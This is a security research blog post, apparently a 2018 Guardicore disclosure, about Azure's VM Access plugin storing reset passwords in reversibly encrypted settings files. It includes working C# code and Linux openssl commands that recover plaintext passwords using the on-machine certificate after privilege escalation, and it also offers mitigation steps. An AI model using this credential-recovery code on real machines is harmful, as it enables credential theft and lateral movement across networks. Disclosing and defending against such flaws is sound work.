    Azure offers a rich plugin system enabling developers and administrators to interact with virtual machines. The core of this functionality is a cross-platform agent built into every marketplace virtual machine image. This agent is a background service that continually communicates with a controller (part of the Azure infrastructure), receives tasks to execute, performs them and reports back.

    At the highest level, the administrator, using the Azure portal or API, provides an operation to be executed on the guest virtual machine. The Azure infrastructure then provides the Guest Agent the requested configuration and if required, the plugin to execute it. For example, if the administrator wants to collect specific diagnostics from a machine, Azure provides a plugin package named IaaSDiagnostics and a configuration file with the parameters encoded inside.


    Plugin Configuration Files

    The communication between the controller and the Guest Agent occurs over plain HTTP and an XML-based protocol. Each configuration is transmitted as a JSON data structure wrapped in XML, and only the raw JSON is stored on disk. The JSON format is identical across all the extensions and is similar to the following data (taken from a VMAccess configuration, version 2.4.2):

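    A sketch of what such a settings file looks like; the field names follow the Azure extension handler settings schema, while the values here are placeholders:

    {
      "runtimeSettings": [
        {
          "handlerSettings": {
            "publicSettings": { "UserName": "admin" },
            "protectedSettingsCertThumbprint": "<certificate thumbprint>",
            "protectedSettings": "<Base64-encoded encrypted blob>"
          }
        }
      ]
    }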

    This data is saved in: C:\Packages\Plugins\<PluginName>\RuntimeSettings

    This folder is readable by any user but writable only by administrators. For example, the configuration file above was saved in:

    C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.2\RuntimeSettings\*.settings

    From our perspective, the important part of this configuration file is the sensitive data (such as passwords), which is encrypted and encoded as a Base64 string and stored in protectedSettings.

    The sensitive data is encrypted using a certificate that the Guest Agent generates for its communication with Azure and hands over to Azure. To read the data encrypted by Azure, the plugin decodes the Base64 blob and decrypts the content using the certificate identified by the thumbprint. On Windows, this certificate is saved in the registry under HKLM\SOFTWARE\Microsoft\SystemCertificates, accessible only to administrators and the operating system itself.

    Recovering Plaintext Data

    Now we have all the ingredients needed to recover plaintext data. The new password, provided by the administrator through the Azure portal, is saved in the protectedSettings section of the configuration file that is passed to the Guest Agent running on the guest machine. This file is saved to disk and contains the new password, first encrypted and then Base64-encoded.


    Once an attacker breaches a machine and successfully escalates privileges, any certificate stored on the machine can be accessed. At that point, all that’s required is reading the Base64-encoded encrypted data, finding the certificate using the supplied thumbprint and – ta-da – the data is successfully recovered. Here’s some simple C# code to decode this data using available Microsoft APIs:

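    A minimal sketch of this approach, assuming the protectedSettings blob is a standard PKCS#7/CMS envelope and that the certificate referenced by the thumbprint (together with its private key) resides in the local machine “My” store; the class name and argument handling are illustrative:

    using System;
    using System.Security.Cryptography.Pkcs;   // System.Security assembly / Pkcs package
    using System.Security.Cryptography.X509Certificates;
    using System.Text;

    class ProtectedSettingsDecryptor
    {
        // Decrypts the Base64 "protectedSettings" blob using the certificate
        // whose thumbprint is listed in the same configuration file.
        static string Decrypt(string protectedSettingsB64, string thumbprint)
        {
            // The transport certificate lives in the local machine store,
            // so this must run with administrator privileges.
            var store = new X509Store(StoreName.My, StoreLocation.LocalMachine);
            store.Open(OpenFlags.ReadOnly);
            X509Certificate2Collection certs = store.Certificates.Find(
                X509FindType.FindByThumbprint, thumbprint, validOnly: false);
            store.Close();

            // The blob is a PKCS#7/CMS enveloped message; decrypt it with the
            // private key of the matching certificate.
            var cms = new EnvelopedCms();
            cms.Decode(Convert.FromBase64String(protectedSettingsB64));
            cms.Decrypt(certs);
            return Encoding.UTF8.GetString(cms.ContentInfo.Content);
        }

        static void Main(string[] args)
        {
            // args[0]: Base64 protectedSettings value, args[1]: certificate thumbprint
            Console.WriteLine(Decrypt(args[0], args[1]));
        }
    }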

    Compiling this code with a small wrapper will easily recover passwords on Windows. On Linux the vulnerability is the same, and the data can be extracted with a few shell commands running as root.
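
    A sketch of that recovery, assuming the default waagent layout (the Guest Agent keeps its transport key pair as /var/lib/waagent/<thumbprint>.prv and .crt) and that the protectedSettings value has already been copied out of the extension’s settings file; the input file name is illustrative:

    # Run as root. The thumbprint comes from the extension's settings file.
    THUMBPRINT="<thumbprint from the settings file>"

    # Decode the Base64 protectedSettings value into its DER-encoded CMS form.
    base64 -d protected_settings.b64 > protected_settings.der

    # Decrypt the PKCS#7/CMS envelope with the Guest Agent's private key.
    openssl smime -decrypt -inform DER \
        -in protected_settings.der \
        -inkey "/var/lib/waagent/${THUMBPRINT}.prv"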

    (Screenshot: successful execution on a Linux machine.)

    For an attacker to successfully execute this attack, two conditions are required:

    • The VM Access plugin must be used to reset a user’s password.
    • The attacker must be able to read the certificate using root/administrator permissions.

    While privilege escalation may not be trivial, reports about escalation methods are published from time to time. For example, nearly a year ago Microsoft closed a trivial privilege escalation in the Azure Guest Agent on Windows that could give attackers full control of the victim’s system. We’ll have more on this in our next post.

    Bypassing defenses as if they don’t exist

    A key effort of the past few years has been ensuring that even if attackers compromise a machine, they cannot easily recover passwords or use any stored credentials. This is crucial, as one of the most common methods of propagating across networks is stealing and reusing credentials. Every operating system provides this guarantee in a different fashion, but at a bare minimum this consists of storing only password hashes. In addition, storing plain passwords is forbidden by many compliance standards, such as PCI DSS and SWIFT.

    When it comes to Windows protection, Microsoft has put great effort into hardening credential storage in Windows and thwarting credential stealing and other attacks – such as Pass the Hash, weaponised by Mimikatz. Over multiple Windows releases, password storage has been hardened, culminating in Credential Guard, introduced in Windows 10.

    With the VM Access plugin, none of this hardening is relevant.

    Diagnosis and Mitigation

    Based on the code provided above, we wrote a diagnostic tool (code available on Github, binary available here) to help check which plaintext credentials are stored on an Azure Windows machine. The tool checks for existing VM Access configuration files and, if any exist, displays the recovered credentials. Run the program inside an Administrator command prompt, as in the following example:

    (Screenshot: result of a successful recovery.)

    If you’ve ever used the VM Access plugin, we recommend that you consider the password to be compromised and change it, without using the plugin. If possible, avoid using the VM Access plugin to reset VM passwords.

    If you still prefer using the plugin, we suggest deleting the configuration files under

    C:\Packages\Plugins\Microsoft.Compute.VmAccessAgent\RuntimeSettings

    after the plugin has finished running, to minimise the time the passwords remain on disk. A sample PowerShell command could be:

    rm -Recurse -Force C:\Packages\Plugins\Microsoft.Compute.VmAccessAgent\2.4.2\RuntimeSettings\*.settings

    The equivalent shell command on Linux is:

    sudo rm -f /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.4.7.1/config

    Summary

    Using this design flaw, an attacker can bypass modern security controls quite easily. An attacker with privileged access to a locked down Windows Server 2016 machine with Credential Guard installed can acquire the plaintext password of an administrator user within a few seconds. This is made possible simply because the Password Recovery mechanism was used, a mechanism delivered by none other than… Azure. An attacker can then attempt to move laterally across the network through password reuse (a common problem with many organizations) and take over additional services.

    While this attack requires high privileges, privilege escalation vulnerabilities are routinely discovered. We will show an attack leveraging the Azure Guest Agent in a future post.

    Lastly, our only reply to Microsoft’s claim of “by design” is: why store passwords using reversible encryption in 2018?

    For more on the implications of the attack and how the Infection Monkey can help, read here.

     

    Sursa: https://www.guardicore.com/2018/03/recovering-plaintext-passwords-azure/
